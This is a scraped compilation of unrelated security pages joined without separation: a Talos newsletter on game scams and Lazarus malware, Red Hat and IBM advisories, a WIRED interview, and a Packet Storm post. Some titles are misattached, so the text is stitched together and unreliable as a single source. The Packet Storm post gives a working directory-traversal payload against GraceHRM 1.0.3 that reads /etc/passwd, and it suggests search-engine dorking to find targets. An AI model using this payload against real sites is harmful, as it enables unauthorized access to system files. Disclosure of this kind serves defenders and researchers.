*   OWASP Zed Attack Proxy (ZAP)

**References**

*   Wikipedia
*   Null character
*   Unicode Encoding
*   Double Encoding
*   PHP Supported Protocols and Wrappers
*   RFC 2397 - The “data” URL scheme

CVE-2023-39699: WSTG - v4.2 | OWASP Foundation

The latest activity from Lazarus Groups, .gov domains scamming people out of "V-Bucks" and more in this week's edition.

Thursday, August 24, 2023 14:08

Welcome to this week’s edition of the Threat Source newsletter.

I have no idea how “Fortnite” keeps coming up in this newsletter, but here we are again.

Even though the game/metaverse has never been bigger, it had been a while since I had heard about “V-Bucks” scams. V-Bucks are the in-game virtual currency “Fortnite” uses to sell character skins and other visual elements.

After the game’s initial surge in popularity, scams claiming to get players easy V-Bucks were all over the place in the form of fake advertisements, phishing emails, scams and YouTube videos. And as the game has only become more ubiquitous, so have scams and cyber attacks centered around the game.

Wired reported last week that a central network of bad actors is responsible for compromising legitimate domains (some of them with the .gov and .edu top-level domains) and using them to trick players into sharing personal information or downloading malicious apps. This widespread campaign targets players of “Fortnite” and “Roblox,” another half-game, half-metaverse.

These compromised sites promised to send rewards in these games to players in exchange for clicking on a link, downloading a file or filling out a form.

This led me down another rabbit hole of potential Fortnite scams that I hadn’t thought about, which are the thousands of knockoffs that exist.

For some reason, just searching “Fortnite” on the Google Play store doesn’t return any results, but when you search “Fortnite game,” users are served with tons of apps of questionable origin and legitimacy. The real “Fortnite” can only be downloaded from the Epic Games Store, owned by the game’s publisher and the subject of a long legal saga with Apple.

The second-most-popular result for “Fortnite game” is something called “Battle Royale Chapter 4 Season3” published on the store by the auspiciously named “EPic Games,” which wreaks of the same vibes as a typosquatted domain.

Some of the top reviews for the app also seem to be written by bots, and in one case, the most recent 5-star review came from a user who appeared to credit ChatGPT with writing the text.

I’m not blaming anyone or any company for the existence of these types of scams, I just think it’s worth noting to parents and potential players that bad actors are still trying to backpack off the popularity of these games. It likely doesn’t fall on the companies making these games to regulate this space and make sure scammers aren’t capitalizing off their popularity — after all, no one blames the bank if an attacker uses their name in a phishing email to steal login credentials.

But I also don’t know who it falls to, either. As users, it again falls on us to just be hyper-vigilant and prepared, knowing attackers will try to leverage anything, even fake money used to buy virtual hot dog suits, to scam people.

**The one big thing**

The infamous Lazarus Group APT is back at it again with two new remote access trojans. The North Korean state-sponsored group is well known for using a variety of malware to generate revenue for the hermit government and trying to spy on their various adversaries. Now, they have two new RATs that Talos recently discovered, largely based on open-source tools or previously leaked malware code. Lazarus Group is increasingly using the Qt framework to create their malware, which poses new challenges for defenders. It increases the complexity of the malware’s code, making human analysis more difficult.

**Why do I care?**

Any time the Lazarus Group is active, everyone should take notice. This is one of the most high-profile APTs on the threat landscape right now, and they’ve shown that they will not hesitate to exhaust all options to try to generate money for North Korea’s government. With this specific set of RATs, they are smaller than Lazarus’ usual payloads, which makes their operations slimmer, faster and harder to detect. Once infected, Lazarus Group can carry out a wide range of malicious actions on targets, ranging from deploying ransomware to completely lock down targeted machines, stealing personal information, or hijacking hardware for cryptocurrency mining.

**So now what?**

Both the blogs we published Thursday morning include guidance on remediating these threats. The use of open-source tooling can sometimes make it easier for security researchers to spot Lazarus Group activity, and in the case of the two new RATs, Talos has a wide range of Snort and ClamAV detection available.

**Top security headlines of the week**

**The FBI warned that North Korean state-sponsored actors are preparing to cash out up to $40 million worth of cryptocurrency after multiple heists.** The Lazarus Group reportedly is holding onto six separate crypto wallets holding a combined 1,580 Bitcoin over the course of 24 hours earlier this week. This APT is known for carrying out data breaches and cyber attacks to generate funding for the country’s illegal nuclear weapons program. The Lazarus Group previously stole $60 million and $37 million in cryptocurrency from Alphapo and CoinsPaid, respectively, in July, and $100 million from Atomic Wallet in June. In its alert, the FBI shared the Bitcoin addresses associated with the attacks so cryptocurrency agencies could examine their blockchain data and “be vigilant in guarding against transactions directly with, or derived from the addresses.” (TechCrunch, SecurityWeek)

**A previously unknown hacking group appears to be behind a supply chain attack targeting roughly 100 computers located in Hong Kong and other areas of Asia.** Security researchers attributed the attack to a new actor known as “Carderbee” that is currently not tied to any state affiliations. The attackers exploited the legitimate Cobra DocGuard software — made by a Chinese software company — to deliver a malicious software update that compromised the machines. Because only about 2,000 machines worldwide use DocGuard, researchers believe it is a highly targeted attack looking to compromise specific victims. Each attack tried to deploy the Korplug (the predecessor of PlugX) backdoor onto victim computers. (CyberScoop, The Record by Recorded Future)

**The Clop threat actor was responsible for more than a third of all ransomware attacks in July,** according to multiple industry reports. Clop continues to carry out follow-on attacks associated with its massive breach of the MOVEit file transfer software. More than 4 million Colorado residents may have been affected because of the MOVEit breach, with the state’s Department of Health Care Policy & Financing (HCPF) disclosing this week that it was affected through a technology partner, IBM. HCPF stated that the MOVEit data breach leaked sensitive data but did not compromise the state agency’s internal systems. As of this week, some estimates state that more than 730 organizations have been affected by the MOVEit breach. (Cybersecurity Dive, CPO Magazine)

**Can’t get enough Talos?**

*   Talos Takes Ep. #151: Hacktivism is quietly growing, especially when it comes to Russia's invasion of Ukraine
*   Three vulnerabilities in NVIDIA graphics driver could cause memory corruption
*   Generating FLIRT signatures for Nim and other non-C programming languages
*   Cisco: Bringing More Intelligence to Bear on the Threat Landscape

**Upcoming events where you can find Talos**

**LABScon** **(Sept. 20 - 23)**

Scottsdale, Arizona

> Vitor Ventura gives a presentation that’s a detailed account and timeline of one such mercenary organization, from almost bankrupt to having a fully working spyware targeting iOS and Android with a one-click zero-day exploit.

**Grace Hopper Celebration** **(Sept. 26 - 29)**

Orlando, Florida

> Caitlin Huey, Susan Paskey and Alexis Merritt present a "Level Up Lab" titled "Don’t Fail Knowledge Checks: Accelerating Incident Response with Threat Intelligence." Participate in several fast-paced activities that emphasize the importance of threat intelligence in security incident investigations. Attendees will act as incident responders investigating a simulated incident that unfolds throughout this session. Periodic checkpoints will include discussions that highlight how incident response and threat intelligence complement each other during an active security investigation.

**ATT&CKcon 4.0** **(Oct. 24 - 25)**

McLean, Virginia

> Nicole Hoffman and James Nutland discuss the MIRE ATT&CK framework in “One Leg to Stand on: Adventures in Adversary Tracking with ATT&CK.” Even though ATT&CK has become an industry standard for cyber threat intelligence reporting, all too often, techniques are thrown at the bottoms of reports and blogs without any context never to be seen again after dissemination. This is not useful for intelligence producers or consumers. In this presentation, Nicole and James will show analysts how to use ATT&CK as a guideline for creating a contextual knowledge base for adversary tracking.

**Most prevalent malware files from Talos telemetry over the past week**

**SHA 256:** 24283c2eda68c559f85db7bf7ccfe3f81e2c7dfc98a304b2056f1a7c053594fe  
**MD5:** 49ae44d48c8ff0ee1b23a310cb2ecf5a  
**Typical Filename:** nYzVlQyRnQmDcXk  
**Claimed Product:** N/A  
**Detection Name:** Win.Dropper.Scar::tpd

**SHA 256:** a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91  
**MD5:** 7bdbd180c081fa63ca94f9c22c457376  
**Typical Filename:** c0dwjdi6a.dll  
**Claimed Product:** N/A  
**Detection Name:** Trojan.GenericKD.33515991

**SHA 256:** 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507  
**MD5:** 2915b3f8b703eb744fc54c81f4a9c67f  
**Typical Filename:** VID001.exe  
**Claimed Product:** N/A  
**Detection Name:** Win.Worm.Coinminer::1201

**SHA 256:** 4c3c7be970a08dd59e87de24590b938045f14e693a43a83b81ce8531127eb440  
**MD5:** ef6ff172bf3e480f1d633a6c53f7a35e  
**Typical Filename:** iizbpyilb.bat  
**Claimed Product:** N/A  
**Detection Name:** Trojan.Agent.DDOH

**SHA 256:** 5e537dee6d7478cba56ebbcc7a695cae2609010a897d766ff578a4260c2ac9cf  
**MD5:** 2cfc15cb15acc1ff2b2da65c790d7551  
**Typical Filename:** rcx4d83.tmp  
**Claimed Product:** N/A  
**Detection Name:** Win.Dropper.Pykspa::tpd

Years into these games’ histories, attackers are still creating “Fortnite” and “Roblox”-related scams

Red Hat Security Advisory 2023-4674-01 - Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments. This advisory contains the RPM packages for Red Hat OpenShift Container Platform 4.12.30.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Moderate: OpenShift Container Platform 4.12.30 packages and security update  
Advisory ID:       RHSA-2023:4674-01  
Product:           Red Hat OpenShift Enterprise  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4674  
Issue date:        2023-08-23  
CVE Names:         CVE-2022-27664  
====================================================================  
1. Summary:

Red Hat OpenShift Container Platform release 4.12.30 is now available with  
updates to packages and images that fix several bugs and add enhancements.

This release includes a security update for Red Hat OpenShift Container  
Platform 4.12.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat OpenShift Container Platform 4.12 - aarch64, ppc64le, s390x, x86_64

3. Description:

Red Hat OpenShift Container Platform is Red Hat's cloud computing  
Kubernetes application platform solution designed for on-premise or private  
cloud deployments.

This advisory contains the RPM packages for Red Hat OpenShift Container  
Platform 4.12.30. See the following advisory for the container images for  
this release:

https://access.redhat.com/errata/RHSA-2023:4671

Security Fix(es):

* golang: net/http: handle server errors after sending GOAWAY  
(CVE-2022-27664)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

All OpenShift Container Platform 4.12 users are advised to upgrade to these  
updated packages and images when they are available in the appropriate  
release channel. To check for available updates, use the OpenShift CLI (oc)  
or web console. Instructions for upgrading a cluster are available at  
https://docs.openshift.com/container-platform/4.12/updating/updating-cluster-cli.html

4. Solution:

For OpenShift Container Platform 4.12 see the following documentation,  
which will be updated shortly for this release, for important instructions  
on how to upgrade your cluster and fully apply this asynchronous errata  
update:

https://docs.openshift.com/container-platform/4.12/release_notes/ocp-4-12-release-notes.html

5. Bugs fixed (https://bugzilla.redhat.com/):

2124669 - CVE-2022-27664 golang: net/http: handle server errors after sending GOAWAY

6. Package List:

Red Hat OpenShift Container Platform 4.12:

Source:  
cri-o-1.25.4-4.rhaos4.12.gitb9319a2.el8.src.rpm  
openshift-clients-4.12.0-202308151125.p0.gf61957e.assembly.stream.el8.src.rpm

aarch64:  
cri-o-1.25.4-4.rhaos4.12.gitb9319a2.el8.aarch64.rpm  
cri-o-debuginfo-1.25.4-4.rhaos4.12.gitb9319a2.el8.aarch64.rpm  
cri-o-debugsource-1.25.4-4.rhaos4.12.gitb9319a2.el8.aarch64.rpm  
openshift-clients-4.12.0-202308151125.p0.gf61957e.assembly.stream.el8.aarch64.rpm

ppc64le:  
cri-o-1.25.4-4.rhaos4.12.gitb9319a2.el8.ppc64le.rpm  
cri-o-debuginfo-1.25.4-4.rhaos4.12.gitb9319a2.el8.ppc64le.rpm  
cri-o-debugsource-1.25.4-4.rhaos4.12.gitb9319a2.el8.ppc64le.rpm  
openshift-clients-4.12.0-202308151125.p0.gf61957e.assembly.stream.el8.ppc64le.rpm

s390x:  
cri-o-1.25.4-4.rhaos4.12.gitb9319a2.el8.s390x.rpm  
cri-o-debuginfo-1.25.4-4.rhaos4.12.gitb9319a2.el8.s390x.rpm  
cri-o-debugsource-1.25.4-4.rhaos4.12.gitb9319a2.el8.s390x.rpm  
openshift-clients-4.12.0-202308151125.p0.gf61957e.assembly.stream.el8.s390x.rpm

x86_64:  
cri-o-1.25.4-4.rhaos4.12.gitb9319a2.el8.x86_64.rpm  
cri-o-debuginfo-1.25.4-4.rhaos4.12.gitb9319a2.el8.x86_64.rpm  
cri-o-debugsource-1.25.4-4.rhaos4.12.gitb9319a2.el8.x86_64.rpm  
openshift-clients-4.12.0-202308151125.p0.gf61957e.assembly.stream.el8.x86_64.rpm  
openshift-clients-redistributable-4.12.0-202308151125.p0.gf61957e.assembly.stream.el8.x86_64.rpm

Red Hat OpenShift Container Platform 4.12:

Source:  
openshift-clients-4.12.0-202308151125.p0.gf61957e.assembly.stream.el9.src.rpm

aarch64:  
openshift-clients-4.12.0-202308151125.p0.gf61957e.assembly.stream.el9.aarch64.rpm

ppc64le:  
openshift-clients-4.12.0-202308151125.p0.gf61957e.assembly.stream.el9.ppc64le.rpm

s390x:  
openshift-clients-4.12.0-202308151125.p0.gf61957e.assembly.stream.el9.s390x.rpm

x86_64:  
openshift-clients-4.12.0-202308151125.p0.gf61957e.assembly.stream.el9.x86_64.rpm  
openshift-clients-redistributable-4.12.0-202308151125.p0.gf61957e.assembly.stream.el9.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-27664  
https://access.redhat.com/security/updates/classification/#moderate  
https://docs.openshift.com/container-platform/4.12/release_notes/ocp-4-12-release-notes.html

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJk5nCbAAoJENzjgjWX9erEpc0P/1+iF4XNpzS6djOacDQoIDps  
7ChiCnOn/6WuLeuXTpAPugngaaYDeK9Zdmbi9SOgq9OL+iVUJd9XsMGCShb1hHZJ  
6NquTZbjI55WrVI192A8TakFjCu1jOgpb4BjpWODMQ+G8uVs6P0DvNdxjiApQioy  
rjglbitP0QsEWmLPNzcYVJsTfqrySTzo6HQVg15MP9MlDf/pRzWtIgFrb0ZKqVyk  
LDwYXEta7ngz+C3yJpdE6kpV+U+k4VqEJzUeeooclDt9EK8W+fjfQydQ5ynHTUKJ  
5plSHbonr9J0v/KGGK+CCSAM3oV3/11t1gLMsckFnco0X5cApaeqaBTqIgN1Sprc  
a3NfpJWxR7e94l4SljOPlnMvFs9qh1TFWBPl163EEyeYCSBSAfd7dZGFTW4wf0dn  
/DDwpGclvTezU/xkJLjqcyfJlM0Jiendt9BHUZbRL2bh03Hc+f94SZEl2IOsRN5D  
DV75avEWLBWwcKaQ8bJLwkFeG6759jOx8GhOV5Hsxiwo41OQbEFgoZg3QMabX6aU  
iKKmp3u24YQ65osakIC17J79WuRKu9WSpucUXZpoiTylnHpi/4UcYTMYjOtf4ELH  
iDcd5jwFe7bWWGPQlgsw+KhQXVVy4kDwDbyYeOreqBOqJnLeqatfNI2f1D7fCJDp  
B3TcRpIruZnY7370tddX  
=xepm  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4674-01

GraceHRM version 1.0.3 suffers from a directory traversal vulnerability.

**GraceHRM 1.0.3 Directory Traversal**

Posted Aug 24, 2023

Authored by indoushka

GraceHRM version 1.0.3 suffers from a directory traversal vulnerability.

tags | exploit, file inclusion

SHA-256 | 1ef7aca42ba692fa60907a0530d21ee9db579bba9acd7d508271bcf4d6e8171a

Download | Favorite | View

**GraceHRM 1.0.3 Directory Traversal**

    ====================================================================================================================================| # Title     : GraceHRM v1.0.3 Directory traversal Vulnerability                                                                  || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0(64-bit)                                               | | # Vendor    : http://p30vel.ir/                                                                                                  |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : /admin/download?type=files&filename=../../../../../../../../../etc/passwd[+] http://127.0.0.1/hrmgraceitltdcom/admin/download?type=files&filename=../../../../../../../../../etc/passwdGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (82,010)
*   Arbitrary (16,214)
*   BBS (2,859)
*   Bypass (1,740)
*   CGI (1,026)
*   Code Execution (7,282)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,348)
*   DoS (23,453)
*   Encryption (2,370)
*   Exploit (51,962)
*   File Inclusion (4,223)
*   File Upload (976)
*   Firewall (821)
*   Info Disclosure (2,785)
*   Intrusion Detection (892)
*   Java (3,045)
*   JavaScript (859)
*   Kernel (6,681)
*   Local (14,456)
*   Magazine (586)
*   Overflow (12,693)
*   Perl (1,423)
*   PHP (5,149)
*   Proof of Concept (2,338)
*   Protocol (3,603)
*   Python (1,535)
*   Remote (30,803)
*   Root (3,587)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,640)
*   Security Tool (7,889)
*   Shell (3,187)
*   Shellcode (1,215)
*   Sniffer (895)
*   Spoof (2,207)
*   SQL Injection (16,385)
*   TCP (2,406)
*   Trojan (687)
*   UDP (893)
*   Virus (665)
*   Vulnerability (31,788)
*   Web (9,670)
*   Whitepaper (3,750)
*   x86 (962)
*   XSS (17,956)
*   Other

**File Archives**

*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,002)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,925)
*   Debian (6,819)
*   Fedora (1,692)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (351)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,508)
*   Mac OS X (686)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (485)
*   RedHat (13,753)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,836)
*   UNIX (9,292)
*   UnixWare (186)
*   Windows (6,575)
*   Other

GraceHRM 1.0.3 Directory Traversal

IBM AIX 7.2, 7.3, VIOS 3.1's OpenSSH implementation could allow a non-privileged local user to access files outside of those allowed due to improper access controls.  IBM X-Force ID:  263476.

**Security Bulletin**

  

**Summary**

Vulnerabilities in AIX's OpenSSH could allow a non-privileged local user file access outside of those allowed (CVE-2023-40371) or allow a remote attacker to execute arbitrary code (CVE-2023-38408). OpenSSH is used by AIX for remote login.

**Vulnerability Details**

**CVEID:**   CVE-2023-40371  
**DESCRIPTION:**   IBM AIX's OpenSSH implementation could allow a non-privileged local user to access files outside of those allowed due to improper access controls.  
CVSS Base score: 6.2  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/263476 for the current score.  
CVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)

**CVEID:**   CVE-2023-38408  
**DESCRIPTION:**   OpenSSH could allow a remote attacker to execute arbitrary code on the system, caused by a flaw in the forwarded ssh-agent. By sending specially crafted requests, an attacker could exploit this vulnerability to execute arbitrary code on the system.  
CVSS Base score: 8.1  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/261022 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H)

**Affected Products and Versions**

Affected Product(s)

Version(s)

AIX

7.2

AIX

7.3

VIOS

3.1

The following fileset levels are vulnerable:

Fileset

Lower Level

Upper Level

openssh.base.client

8.1.102.0

8.1.102.2106

openssh.base.server

8.1.102.0

8.1.102.2106

openssh.base.client

8.1.112.0

8.1.112.2000

openssh.base.server

8.1.112.0

8.1.112.2000

openssh.base.client

9.2.112.0

9.2.112.2000

openssh.base.server

9.2.112.0

9.2.112.2000

To find out whether the affected filesets are installed on your systems, refer to the lslpp command found in AIX user's guide.

Example:  lslpp -L | grep -i openssh.base.client

**Remediation/Fixes**

**A. FIXES**

IBM strongly recommends addressing the vulnerability now.

AIX and VIOS fixes are available. 

The AIX and VIOS fixes can be downloaded via https from:

https://aix.software.ibm.com/aix/efixes/security/openssh\_fix15.tar 

The link above is to a tar file containing this signed advisory, fix packages, and OpenSSL signatures for each package. The fixes below include prerequisite checking. This will enforce the correct mapping between the fixes and AIX Technology Levels.

Note that the tar file contains Interim fixes that are based on OpenSSH version, and AIX OpenSSH fixes are cumulative.

You must be on the 'prereq for install' level before applying the interim fix. This may require installing a new level (prereq version) first from:

https://www.ibm.com/resources/mrs/assets?source=aixbp

AIX Level

Interim Fix

Fileset Name (prereq for install)

7.2, 7.3

38408m9a.230811.epkg.Z

openssh.base (8.1.102.2106)

7.2, 7.3

38408m9b.230811.epkg.Z

openssh.base (8.1.112.2000)

7.2, 7.3

38408m9c.230811.epkg.Z

openssh.base (9.2.112.2000)

VIOS Level

Interim Fix

Fileset Name (prereq for install)

3.1

38408m9a.230811.epkg.Z

openssh.base (8.1.102.2106)

3.1

38408m9b.230811.epkg.Z

openssh.base (8.1.112.2000)

3.1

38408m9c.230811.epkg.Z

openssh.base (9.2.112.2000)

To extract the fixes from the tar file:

tar xvf openssh\_fix15.tar

cd openssh\_fix15

Verify you have retrieved the fixes intact:

The checksums below were generated using the "openssl dgst -sha256 \[filename\]" command as the following:

openssl dgst -sha256

filename

77dbc3b40635e16a2f9dba178727bc3fd5e3321c36823c147eb878250e7f6fd0

38408m9a.230811.epkg.Z

7a4f56811b3dc179916d5b6de337d40775904f2718480d94dc5a97cd92dc4a25

38408m9b.230811.epkg.Z

873adbb99a01500b60729c12bf9a9c18ccf0ac74902cb051d5288eeb4f6ad168

38408m9c.230811.epkg.Z

These sums should match exactly. The OpenSSL signatures in the tar file and on this advisory can also be used to verify the integrity of the fixes.  If the sums or signatures cannot be confirmed, contact IBM Support at http://ibm.com/support/ and describe the discrepancy.         

openssl dgst -sha256 -verify \[pubkey\_file\] -signature \[advisory\_file\].sig \[advisory\_file\]

openssl dgst -sha256 -verify \[pubkey\_file\] -signature \[ifix\_file\].sig \[ifix\_file\]

Published advisory OpenSSL signature file location:

https://aix.software.ibm.com/aix/efixes/security/openssh\_advisory15.asc.sig

**B. FIX AND INTERIM FIX INSTALLATION**

If possible, it is recommended that a mksysb backup of the system be created. Verify it is both bootable and readable before proceeding.

To preview a fix installation:

installp -a -d fix\_name -p all  # where fix\_name is the name of the

                                            # fix package being previewed.

To install a fix package:

installp -a -d fix\_name -X all  # where fix\_name is the name of the

                                            # fix package being installed.

Interim fixes have had limited functional and regression testing but not the full regression testing that takes place for Service Packs; however, IBM does fully support them.

Interim fix management documentation can be found at:

http://www14.software.ibm.com/webapp/set2/sas/f/aix.efixmgmt/home.html

To preview an interim fix installation:

emgr -e ipkg\_name -p         # where ipkg\_name is the name of the

                                         # interim fix package being previewed.

To install an interim fix package:

emgr -e ipkg\_name -X         # where ipkg\_name is the name of the

                                         # interim fix package being installed.

**Workarounds and Mitigations**

None

**References**

Off

**Acknowledgement**

**Change History**

23 Aug 2023: Initial Publication

\*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.

**Disclaimer**

According to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an "industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response." IBM PROVIDES THE CVSS SCORES ""AS IS"" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. "Affected Products and Versions" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.

**Document Location**

Worldwide

\[{"Business Unit":{"code":"BU058","label":"IBM Infrastructure w\\/TPS"},"Product":{"code":"SWG10","label":"AIX"},"Component":"","Platform":\[{"code":"PF002","label":"AIX"}\],"Version":"7.2,7.3","Edition":"","Line of Business":{"code":"LOB08","label":"Cognitive Systems"}},{"Business Unit":{"code":"BU058","label":"IBM Infrastructure w\\/TPS"},"Product":{"code":"SSPHKW","label":"PowerVM Virtual I\\/O Server"},"Component":"","Platform":\[{"code":"PF002","label":"AIX"}\],"Version":"3.1","Edition":"","Line of Business":{"code":"LOB57","label":"Power"}}\]

CVE-2023-40371: Security Bulletin: AIX is vulnerable to unauthorized file access and arbitrary code execution due to OpenSSH (CVE-2023-40371 and CVE-2023-38408)

Musician Alex Pall spoke with WIRED about his VC firm, the importance of raising cybersecurity awareness in a rapidly digitizing world, and his surprise that hackers know how to go hard.

On Saturday, with Hurricane Hilary looming, Alex Pall and Drew Taggart of the DJ duo The Chainsmokers performed a concert at Los Angeles State Historic Park that set an all-time attendance record for the venue. By Tuesday night, Pall was in Switzerland, speaking to WIRED on Zoom, but he had a different recent event on his mind: his and Taggart's first-ever trip earlier this month to the Black Hat security conference in Las Vegas.

On top of being DJs and electronic music producers, The Chainsmokers are also active tech investors. They founded a venture firm, Mantis VC, in 2019 with two other entrepreneurs and now have investments in a broad portfolio of fintech, machine learning, ecommerce, gaming, and healthcare startups. And though Mantis doesn't specifically focus on cybersecurity, the firm is starting to develop a reputation for identifying startups that are attempting to address esoteric yet critical digital security problems.

This morning, for example, the now-independent mobile security app iVerify announced a $4 million seed funding round that Mantis is participating in. The well-regarded app, which grew out of an incubator at the security firm Trail of Bits, aims to take on the mercenary spyware industry by making it easy for people or organizations to scan their iOS and Android devices for suspicious activity and malware. 

How did The Chainsmokers get interested in digital privacy, incident response, software supply chain security, and anti-spyware tools? And how did Pall, a celebrity DJ who performs all over the world, end up partying at Black Hat? He broke it down for us. Our conversation has been lightly edited for length and clarity.

**WIRED: I'm super curious, where does the security and privacy specialization come from?**

**Alex Pall:** I gotta give credit to Saveena \[Mandadi, a Mantis investor and director of operations\] who's definitely the leader of that space for us. She's done a terrific job building out our thesis around the space. But going back a little bit further, you look at our portfolio, and it probably seems a bit out of character for how you would imagine two musicians to be investing their time and money. And that was very much intentional. 

When you're an artist with a platform like ours, you're getting sought out for two things: distribution and marketing—consumer-related brands or creator, economy, and social. But a few years into it, we were reading the news, and you can't help but take a second look at your portfolio and be like, why are we not in companies like Palo Alto Networks and CrowdStrike? And it dawned on us that we were kind of falling victim to the consumer space in a way. We wanted to go out and invest in tools that, behind the scenes, could be the things powering society. And it was also just a challenge at first, like maybe we can be some of the first artists to show what kind of value we could bring outside of the typical ecosystem you'd imagine us investing into.

**Do you feel like you're raising awareness for other investors that security and privacy issues impact everyone's lives and everyone's work?**

People take for granted that if you type in your bank information, it's going to be secure. Or if you log in to your iPhone and send something private to somebody else, that it's not going to end up in the wrong hands. But we had a firsthand experience a number of years ago—our Twitter account got hacked while we were in London. It was a really, really awful experience to have somebody inside your system, speaking like they're you. And obviously, that was just a little taste of the larger consequences that can happen. 

You can easily invest in one really terrible cybersecurity company and say, 'We've made a huge mistake getting into this space.' So I think it's always been the strategy for us to be a part of the best businesses, even if it's not the most exciting work to the average person when you read it on paper. And hopefully, we de-risk it a bit for others by investing in people who are far more experienced than us.

**Why did you want to invest in iVerify? What's important about it and about focusing on the threat of spyware?**

Our phones aren't always as secure as people think, especially for people like journalists and politicians. Mobile device management is obviously a big issue, but there are lots of important people and organizations that probably don't focus enough on it. So it's critical that iVerify is a really powerful but also simple solution.

**What's it been like to connect with the security community? It sometimes has a reputation that it's a group of people who are really tinfoil-hat and hard to interact with or hard to break into.**

There's a lot of pressure on them. Not only do they have to make sure that everything's secure and safe and people are following the guidelines set by an organization, but the pace at which innovation is happening and you're adopting new technologies and bringing new software in—it's a lot of work while still keeping all the customers happy and hoping that the machine doesn't break down. That's a daunting task, and these things are only going to become more and more important as everything becomes more digital. 

In movies, they certainly don't paint \[hackers\] as the outgoing, fun people at the party. They're usually the ones saving the day, which is the truth. So that's something that we've kind of recognized and realized, which is, how do we, through whatever platform we have, bring more awareness to this space and get more people interested and excited about the applications of cybersecurity?

A lot of the time you're dealing with founders who are extremely technical and brilliant, but we all have our shortcomings. I'm not extremely technical or brilliant. So the idea is that we, hopefully, can come together and leverage each others' strengths to accomplish a really challenging goal.

**It sounds like you at least got to have some fun at Black Hat, right?**

We hosted an event at Black Hat for one of the companies we invest in, Chainguard \[which focuses on software supply chain security\]. And they're all wonderful, but I had no idea what kind of crowd we would be drawing on for this. I didn't think everyone was going to be terrible or boring or something, but I was surprised because everyone was awesome. We had a great night out. Eventually, I was like, I've got a show tomorrow, so we can't keep going all night!

**I think security folks are going to be** _**thrilled**_ **to hear that The Chainsmokers had fun partying with them.**

You know, growing up, I was on ClarisWorks pretending I was hacking into things, and I was a big fan of the movie _Hackers._ They were really cool to me. And this stuff is really important. As the world continues to advance with AI technology, we as a society will need more cybersecurity experts. And they deserve more recognition so they can secure all the new things that we're getting excited about. 

We all want to move as fast as possible, but at the end of the day, you can't have this system that's just jerry-rigged together. As new companies spring up and all the code that's being written—you need to have some sort of observability into this in real time to understand where the flaws are. Soon, all of our identities will just be in the metaverse or something. Who knows. So these things become more critical every day.

Tag

#ios